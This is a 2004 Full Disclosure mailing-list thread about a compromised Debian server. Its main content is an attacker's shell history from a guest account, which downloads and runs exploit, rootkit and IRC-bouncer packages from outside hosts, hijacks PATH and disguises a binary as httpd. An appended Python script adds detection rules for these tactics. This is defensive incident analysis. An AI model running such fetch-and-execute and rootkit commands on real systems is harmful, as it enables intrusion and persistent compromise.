Full Disclosure mailing list archives

Re: !SPAM! Automated ssh scanning


From: Richard Verwayen <holle () ackw de>
Date: Thu, 26 Aug 2004 19:44:46 +0200

On Thu, 2004-08-26 at 18:36, Tremaine wrote:
On Thu, 26 Aug 2004 09:43:13 -0500 (CDT), Ron DuFresne
<dufresne () winternet com> wrote:
On Thu, 26 Aug 2004, Richard Verwayen wrote:

On Thu, 2004-08-26 at 15:12, Todd Towles wrote:
The kernel could be safe. But with weak passwords, you are toast. Any
automated tool would test guest/guest.

Hello Todd!

You are right about the passwords, but guest is only an unprivileged
account as you may have on many production machines. But they managed
to become root on this machine due to a kernel(?) exploit!
Should I then consider any woody system to be insecure to let people
work at?


If your users are not trustable, then they should not have access to
local systems of yours.  Once a person has a shell, then they are 95% to
root.

Thanks,

Ron DuFresne


Fair point... but it would still be nice to determine precisely how
they are getting root access so preventative measures can be taken and
the hole plugged.
Some more info that may be useful:


Hosts from which they logged in as my "guest":


Way the attacker got r00t (as listed in guest's history)

PATH=:PATH
xs
uname -a
exit
PATH=:PATH
xs
logout
exit
w
cat /etc/hosts
cd /tmp
wget www.bo2k-rulez.net/a
chmod +x a
./a
wget www.bo2k-rulez.net/psybnc.tgz
tar zfvx psybnc.tgz
cd psybnc
make
mv psybnc xs
sh
uname -a
ls
pico psybnc.conf
rm -rf psybnc.conf
echo "PSYBNC.SYSTEM.PORT1=21221" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
killall -9 xs
sh
exit
logout
cd /var/tmp/
 wget sky.prohosting.com/awxro/linux/xpl.tar.gz
tar xzvf xpl.tar.gz
xpl/ptr1
wget www.bo2k-rulez.net/a
./a
chmod =x a
./a
rm -rf a
exit
exit
passwd
passwd
ls -al
hostname
w
cat /etc/hosts
ifconfig
/sbin/ifconfig
cd /tmp
mkdir ...
wget www.corbeanu.as.ro/t.gz
tar zxvf t.gz
./t
mv fastmech httpd
export PAT="."
export PATH="."
httpd
httpd
wget www.corbeanu.as.ro/god.tgz
wget www.geocities.com/sniffhax/god.tgz
wget roamy.com/god.tgz
wget roarmy.com/god.tgz
tar zxvf god.tgz
cd god
./install
wget www.corbeanu.as.ro/rkid.tgz
tar zxvf rkid.tgz
cd rkid
./setup stelian 6006
ls
ls -a
wget www.generatiapro.go.ro/fast.tgz
tar zxvf fast.tgz
cd fastmech 
bash



-- 
Richard Verwayen <holle () ackw de>
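As an added example (not part of the thread or of any tool mentioned in it), the script below runs a small set of triage rules over a shell history of the kind quoted above: payload fetches into a scratch directory, chmod +x followed by execution of the same file, PATH set to "." or prefixed with an empty entry, hidden "..." directories, a binary renamed to httpd, killall of the previous bouncer, installer runs and password changes. The sample history, the placeholder host name and the rule names are constructed assumptions.

```python
import re
# Rules mirror the tactics visible in the quoted history: stage in a scratch dir,
# fetch a payload, make it executable, hijack PATH, hide files, masquerade as a
# daemon, kill the previous bouncer, run an installer, change passwords.
RULES = [
    ("scratch-dir",       re.compile(r"^\s*cd\s+/(var/)?tmp\b")),
    ("remote-fetch",      re.compile(r"^\s*(wget|curl|ftp|lynx)\b")),
    ("make-executable",   re.compile(r"^\s*chmod\s+[+=]x\b")),
    ("archive-unpack",    re.compile(r"^\s*tar\s+\S*[xz]")),
    ("path-hijack",       re.compile(r"^\s*(export\s+)?PATH=(\"\.\"|'\.'|\.|:)")),
    ("hidden-dir",        re.compile(r"^\s*mkdir\s+\.\S*")),
    ("daemon-masquerade", re.compile(r"^\s*mv\s+\S+\s+(httpd|sshd|crond|syslogd)\b")),
    ("kill-process",      re.compile(r"^\s*(killall|kill\s+-9)\b")),
    ("installer-run",     re.compile(r"^\s*\./(install|setup)\b")),
    ("passwd-change",     re.compile(r"^\s*passwd\b")),
]

def triage_history(lines):
    """Return (line_no, rule, command) for every command that matches a rule."""
    findings = []
    for n, cmd in enumerate(lines, 1):
        for rule, rx in RULES:
            if rx.search(cmd):
                findings.append((n, rule, cmd.strip()))
    return findings

def dropper_chains(lines):
    """Pair each fetched file with a later chmod +x / ./run of the same basename."""
    fetched, chains = {}, []
    for n, cmd in enumerate(lines, 1):
        m = re.match(r"^\s*(?:wget|curl)\s+\S*?([^/\s]+)\s*$", cmd)
        if m:
            fetched[m.group(1)] = n  # basename of the fetched URL -> fetch line
            continue
        for name, at in fetched.items():
            if re.match(rf"^\s*(?:chmod\s+[+=]x\s+|\./){re.escape(name)}\b", cmd):
                chains.append((name, at, n))
    return chains

# Constructed sample modelled on the quoted history (placeholder host, not the real one).
SAMPLE_HISTORY = [
    "w", "cd /tmp", "wget payload.example.invalid/a", "chmod +x a", "./a",
    "tar zxvf t.gz", "mv fastmech httpd", 'export PATH="."', "httpd",
    "mkdir ...", "killall -9 xs", "./install", "passwd", "ls -al",
]

if __name__ == "__main__":
    for n, rule, cmd in triage_history(SAMPLE_HISTORY):
        print(f"line {n:2d} [{rule}] {cmd}")
    print("dropper chains:", dropper_chains(SAMPLE_HISTORY))
```

The same rules can be pointed at /root/.bash_history and the histories of every shell account after an incident like this one, but they only help if the attacker did not clear them, which is another reason to ship shell history and auth logs off the box.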

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

